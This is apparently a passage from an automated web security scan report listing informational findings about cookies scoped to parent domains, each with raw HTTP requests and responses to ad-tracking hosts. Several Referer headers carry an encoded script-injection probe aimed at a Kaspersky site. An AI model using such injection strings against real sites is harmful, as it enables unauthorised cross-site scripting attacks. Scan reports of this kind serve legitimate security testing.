Set-Cookie: ach00=e2ff/25d1:233cf/25d1:ceda/2b2a4:66c2/2b2a3:7bcf/2b53b:903d/15148; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=d518598/25d1/145a59c2/e2ff/4e3f43a9:d75a0d4/25d1/13ed2747/233cf/4e496158:d3ff520/2b2a4/13cf9a34/ceda/4e6039d7:d4250f2/2b2a3/13d2744e/66c2/4e603a12:d76e462/2b53b/145fb5f0/7bcf/4e638463:da889cf/15148/fa4a3c6/903d/4e638463; expires=Tuesday, 03-Sep-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 04 Sep 2011 14:00:02 GMT
Connection: close

9.27. http://go.techtarget.com/clicktrack-r/activity/activity.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.techtarget.com
Path:	/clicktrack-r/activity/activity.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

co=%7B%22countryId%22%3A%22UNKNOWN%22%2C%22id%22%3A%22UNKNOWN%22%2C%22f2000%22%3A%22UNKNOWN%22%2C%22empSizeId%22%3A%22UNKNOWN%22%2C%22empSize%22%3A%22UNKNOWN%22%2C%22f1000%22%3A%22UNKNOWN%22%2C%22revenueId%22%3A%22UNKNOWN%22%2C%22industryId%22%3A%22UNKNOWN%22%2C%22industry%22%3A%22UNKNOWN%22%2C%22dbSic%22%3A%22UNKNOWN%22%2C%22type%22%3A%22UNKNOWN%22%2C%22revenue%22%3A%22UNKNOWN%22%7D; domain=.techtarget.com; path=/; expires=Sat, 03-Dec-2011 12:15:14 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicktrack-r/activity/activity.gif?activityTypeId=16&t=299972&t2=301219&a=2011-09-04%2007:14:05&c=normal&r=340617&g=2240040538 HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchsecurity.techtarget.com/tip/Addressing-the-dangers-of-JavaScript-in-the-enterprise
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: googFCF=a37ee93fdfdd1310VgnVCM1000000d01c80aRCRD; referrer=referrerhttp%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db%3Bkeyword%2522xss.cx%2522%3Basrc%3Beid%0A; tt_prereg=t1@299972%24t2@301219%24_2011-09-04%2007%3A14%3A05%26g%3D2240040538; __utma=1.1422293104.1315138449.1315138449.1315138449.2; __utmb=1.1.10.1315138449; __utmc=1; __utmz=1.1315138449.2.2.utmcsr=google.com|utmccn=(organic)|utmcmd=organic|utmctr=%22xss.cx%22; tt_ui=%7B%22textSize%22%3A0%7D; ugcCltHeight=

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Location: http://media.techtarget.com/searchTechTarget/images/spacer.gif
Set-Cookie: co=%7B%22countryId%22%3A%22UNKNOWN%22%2C%22id%22%3A%22UNKNOWN%22%2C%22f2000%22%3A%22UNKNOWN%22%2C%22empSizeId%22%3A%22UNKNOWN%22%2C%22empSize%22%3A%22UNKNOWN%22%2C%22f1000%22%3A%22UNKNOWN%22%2C%22revenueId%22%3A%22UNKNOWN%22%2C%22industryId%22%3A%22UNKNOWN%22%2C%22industry%22%3A%22UNKNOWN%22%2C%22dbSic%22%3A%22UNKNOWN%22%2C%22type%22%3A%22UNKNOWN%22%2C%22revenue%22%3A%22UNKNOWN%22%7D; domain=.techtarget.com; path=/; expires=Sat, 03-Dec-2011 12:15:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 100
Date: Sun, 04 Sep 2011 12:15:14 GMT

The URL has moved <a href="http://media.techtarget.com/searchTechTarget/images/spacer.gif">here</a>

9.28. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 12:26:33 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6VB-Z@twQ.V#j3TGcl3r9]tNb2H[3NJi'/RQ^lF7-bypUl=]uPMlADVbh1Xcf-.v/g@WtaZ=8EHjv.fMEQQ4D0KZs5ZJ++C*jnpEeVSwD7fr25k7@e+s26pS+gmV!r?M3yNEPu4_e=9m[RM:i^7'x5TP>$#TB8+_Xajv@YVI12'FQYDR`2Uq%pLjPy89(^'Po#PjBu27FS$>2uqi-os0j; path=/; expires=Sat, 03-Dec-2011 12:26:33 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=95195&t=2 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc!z6VB-Z@twQ.V#j3TGcl3r9]tNb2H[3NJi'/RQ^lF7-bypUl=]uPMlADVbh1Xcf-.v/g@WtYH4%4D0KZfI)9s4EoQJx+G.J#)?LHo!v$.*:U0^DSw+YJ<'DHgjI<e*z8_9vr?z].tDhdYRW^Rx8S<0O0WgFewL%K81dGCQPCH[[?Mb%0EOU.tt'Ike5:b6NfK_N%iqe#)613vo?)ka; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 12:26:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 12:26:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6VB-Z@twQ.V#j3TGcl3r9]tNb2H[3NJi'/RQ^lF7-bypUl=]uPMlADVbh1Xcf-.v/g@WtaZ=8EHjv.fMEQQ4D0KZs5ZJ++C*jnpEeVSwD7fr25k7@e+s26pS+gmV!r?M3yNEPu4_e=9m[RM:i^7'x5TP>$#TB8+_Xajv@YVI12'FQYDR`2Uq%pLjPy89(^'Po#PjBu27FS$>2uqi-os0j; path=/; expires=Sat, 03-Dec-2011 12:26:33 GMT; domain=.adnxs.com; HttpOnly
Location: http://ad.yieldmanager.com/pixel?id=1325214&t=2
Date: Sun, 04 Sep 2011 12:26:33 GMT
Content-Length: 0

9.29. http://id.google.com/verify/EAAAAON_69mnEvmo-ER-Dz4hnl0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAON_69mnEvmo-ER-Dz4hnl0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq; expires=Mon, 05-Mar-2012 12:33:27 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAON_69mnEvmo-ER-Dz4hnl0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Axss.cx+usa.kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=WmGlkXdwqca1nm4j75M18GyAqO7DLXXzX2fg2CdM0Q=AyVLIvKmo1GP01k8; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=XU0IQAZklWhyhWdlymBvdCxVkSIFK9aUlYUQMFi34UxO1ecYTEfO4ZrKByNclFfOyvF5AaGDzivPGm42OGxJA3ND_Gd1jskTnbkzYzvsb4F6P5IHltVNnazrs6Pi8hSq; expires=Mon, 05-Mar-2012 12:33:27 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sun, 04 Sep 2011 12:33:27 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

9.30. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; domain=.interclick.com; expires=Sat, 04-Sep-2021 12:27:21 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=87172444-012b-48da-9f25-bbc315b0dd49 HTTP/1.1
Host: idcs.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; tpd=e20=1315359826890&e90=1313372627004&e50=1315359827084&e100=1313372627366
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=7435=734382&7980=734355&7596=734356&8629=734382&6376=734377&508=734383; domain=.interclick.com; expires=Sat, 04-Sep-2021 12:27:21 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sun, 04 Sep 2011 12:27:21 GMT

GIF89a.............!.......,...........D..;

9.31. http://idgenterprise.112.2o7.net/b/ss/computerworldcom/1/H.20.3/s25338357510045 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idgenterprise.112.2o7.net
Path:	/b/ss/computerworldcom/1/H.20.3/s25338357510045

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_sx7Fx7Dx60edubgx7Fbx7Ctsx7Fx7D=[CS]v4|2731C23B05160255-400001832002EC87|4E6383B7[CE]; Expires=Fri, 2 Sep 2016 14:00:22 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/computerworldcom/1/H.20.3/s25338357510045 HTTP/1.1
Host: idgenterprise.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 14:00:22 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_sx7Fx7Dx60edubgx7Fbx7Ctsx7Fx7D=[CS]v4|2731C23B05160255-400001832002EC87|4E6383B7[CE]; Expires=Fri, 2 Sep 2016 14:00:22 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 14:00:22 GMT
Last-Modified: Mon, 05 Sep 2011 14:00:22 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E638476-049D-187E5B5D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035308&d.c=gif&d.o=computerworldcom&d.x=44242753&d.t=page
xserver: www425
Content-Length: 0
Content-Type: text/plain
Connection: close

9.32. http://kaplab.netmng.com/pixel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kaplab.netmng.com
Path:	/pixel/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

evo5=y9dly9jlztlwn%7CG2qCZKSW8tqIXW1OFjBNOfqDRwEEwkfNaOwDF%2FyU4Lo1Ltew3WXj21QSrslqQm7tahZ3dgaB5w403uJTNF9y22IO2aTcPgE%2BnUZIQtb7RPpNYgW2AhSYsvjc7joKqgi3R0Veb5F%2FhWoQwrdVgOBpSyAxl94dcNrNhlTsrJsldjjNySW361HGl8YRSNPkx7v1l9XQdG%2Fqop7DKqcyrGuuYrviAyh8fj8cULJLFrxiCyBs%2FHiEO969m3yJGazRZ8rLD0aq%2F7Eenc1CUN2yc1Suj7sgA3XwZgvBWpf4r1483PkMdgltAvHLAecQh%2FePPhaHDiExlxFGUIf17zGs8XV4V%2FStoEy0VzzNJiPkKSJ%2B8QfVKObBfXgbHQ%2B0ShJR591%2B; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com
evo5=y9dly9jlztlwn%7CJY%2BmeTt6iwt3MBIN8460Cj6P25CFyUyaafcp8uQt1uSK%2ByJCAdUop4ZtlWAm7SmS%2B%2FDrxyTJpwKpaPel07TNe85F7pyXNgy3XMLNxEdlK26a2XaRkJuEiO3GAmBI3IVAYnuXG1tWbwU1dsmmMgq45L%2Fr%2FWftzXCO9z3Eh4%2B36d%2Bo5oMeesb6FIsNm7aV191oBD6NTwyH8dnzeA1UepFT%2FJAauhyUfIHW83VCPXTWyP0S%2FefowWdYnh7HL1%2BJZc2v6OIFMsoP0K4M4xx9lGRSnE3UN%2FhS6QJB5EQ8RUrotrHC9%2FEDFCwhwZANtw4Pct8FNH3eu5Ou%2BnMWeXaowWLuANtgPRfmQMdP0Kt2HugMFoRS7SabR5hKXPfSfN1HpOZmRr0lar3v9ovrGjoH1yLd4m8laqPjvASyEUwyC%2BNVGkU%3D; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel/?aid=234&tax=home HTTP/1.1
Host: kaplab.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7CG2qCZKSW8tqIXW1OFjBNOfqDRwEEwkfNaOwDF%2FyU4Lo1Ltew3WXj21QSrslqQm7tahZ3dgaB5w403uJTNF9y22IO2aTcPgE%2BnUZIQtb7RPpNYgW2AhSYsvjc7joKqgi3R0Veb5F%2FhWoQwrdVgOBpSyAxl94dcNrNhlTsrJsldjjNySW361HGl8YRSNPkx7v1l9XQdG%2Fqop7DKqcyrGuuYrviAyh8fj8cULJLFrxiCyBs%2FHiEO969m3yJGazRZ8rLD0aq%2F7Eenc1CUN2yc1Suj7sgA3XwZgvBWpf4r1483PkMdgltAvHLAecQh%2FePPhaHDiExlxFGUIf17zGs8XV4VxYWF5pVSSdNdVUHXVvh19eyAjRnuiO9Zd%2B0R1jZB%2BsZ
Cache-Control: max-age=0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 12:27:22 GMT
Server: Apache/2.2.9
P3P: policyref="http://kaplab.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Fri, 02 Sep 2011 12:27:22 GMT
Last-Modified: Fri, 02 Sep 2011 12:27:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=y9dly9jlztlwn%7CG2qCZKSW8tqIXW1OFjBNOfqDRwEEwkfNaOwDF%2FyU4Lo1Ltew3WXj21QSrslqQm7tahZ3dgaB5w403uJTNF9y22IO2aTcPgE%2BnUZIQtb7RPpNYgW2AhSYsvjc7joKqgi3R0Veb5F%2FhWoQwrdVgOBpSyAxl94dcNrNhlTsrJsldjjNySW361HGl8YRSNPkx7v1l9XQdG%2Fqop7DKqcyrGuuYrviAyh8fj8cULJLFrxiCyBs%2FHiEO969m3yJGazRZ8rLD0aq%2F7Eenc1CUN2yc1Suj7sgA3XwZgvBWpf4r1483PkMdgltAvHLAecQh%2FePPhaHDiExlxFGUIf17zGs8XV4V%2FStoEy0VzzNJiPkKSJ%2B8QfVKObBfXgbHQ%2B0ShJR591%2B; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com
Set-Cookie: evo5=y9dly9jlztlwn%7CJY%2BmeTt6iwt3MBIN8460Cj6P25CFyUyaafcp8uQt1uSK%2ByJCAdUop4ZtlWAm7SmS%2B%2FDrxyTJpwKpaPel07TNe85F7pyXNgy3XMLNxEdlK26a2XaRkJuEiO3GAmBI3IVAYnuXG1tWbwU1dsmmMgq45L%2Fr%2FWftzXCO9z3Eh4%2B36d%2Bo5oMeesb6FIsNm7aV191oBD6NTwyH8dnzeA1UepFT%2FJAauhyUfIHW83VCPXTWyP0S%2FefowWdYnh7HL1%2BJZc2v6OIFMsoP0K4M4xx9lGRSnE3UN%2FhS6QJB5EQ8RUrotrHC9%2FEDFCwhwZANtw4Pct8FNH3eu5Ou%2BnMWeXaowWLuANtgPRfmQMdP0Kt2HugMFoRS7SabR5hKXPfSfN1HpOZmRr0lar3v9ovrGjoH1yLd4m8laqPjvASyEUwyC%2BNVGkU%3D; expires=Mon, 05-Mar-2012 12:27:22 GMT; path=/; domain=.netmng.com
Location: //r.openx.net/set?pid=9af5e269-ffc3-60ee-513f-0d7cb918982a&rtb=y9dly9jlztlwn
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

9.33. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ACID=optout!; domain=advertising.com; expires=Tue, 03-Sep-2013 12:18:51 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=kasperskylab_cs=1&betq=14704=443434 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 12:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 03-Sep-2013 12:18:51 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 13:18:51 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.34. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/
GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=kasperskylab_cs=1&betq=14704=443434 HTTP/1.1
Host: leadback.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: ACID=tX790013123977920032; C2=152YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; aceRTB=rm%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cam%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Cdc%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Can%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7Crub%3DWed%2C%2007%20Sep%202011%2001%3A43%3A47%20GMT%7C; GUID=MTMxNTEzOTE4OTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 12:27:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=q62YOBbfC0zjGQQhrCQcHW0uSKsBdbdBGbAmoZgxi+iBeziBGnLuHYRxGwakAfwuRX4q0utBT7qhZB2IzaYWhahBdPiBGjpDAcHvG4EA7xrBOpKPGEIZGa8kffQucX8+5CHCqQsBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/
Set-Cookie: GUID=MTMxNTEzOTI0MjsxOjE3Mmpta2gxN2cxMHJzOjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 12:27:22 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 13:27:22 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.35. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 12:50:05 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d360F843730F542A7A6E2E0ACB7BADB9D%7cEANON%3dA%253D01670223Ou8Z1DpMLAy4shwnCb3FghYLyh8Mu9TpncnSwvRVjkGb-MY3AEOkmnI_h7PAzMaQ8A-1hX5axxmfdpM84K5uB%2526E%253Db9f%2526W%253D1%7cNAP%3dV%253D1.9%2526E%253Db45%2526C%253DfwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog%2526W%253D1 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com&d6626%22%3E%3Cscript%3Eprompt(%22E-Mail%22)%3C/script%3Eccf8d1d548d=1
Cookie: uuid2=2230616255569715877; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6VB-Z@twQ.V#j3TGcl3r9]tNb2H[3NJi'/RQ^lF7-bypUl=]uPMlADVbh1Xcf-.v/g@WtaZ=8EHjv.fMEQQ4D0KZs5ZJ++C*jnpEeVSwD7fr25k7@e+s26XE'I1cc_R<'D/<vdtST2WmJWv7/![N8=nTm6JB<GI]?bh%YyAoXdk_0vm.d5:WK9*Ga]]uLn39N-[xvKC6d*6l?-u$s%J[9x8r)Yte3Ec8s-jt; icu=ChII9K4DEAoYASABKAEwzZ_u8gQQzZ_u8gQYAA..; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 12:50:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2230616255569715877; path=/; expires=Sat, 03-Dec-2011 12:50:05 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Sun, 04 Sep 2011 12:50:05 GMT

GIF89a.............!.......,........@..L..;

9.36. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

pluto=308875122887; domain=.fastclick.net; path=/; expires=Tue, 03-Sep-2013 12:27:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/tre?ad_id=21227;evt=14627;cat1=15399;cat2=17069 HTTP/1.1
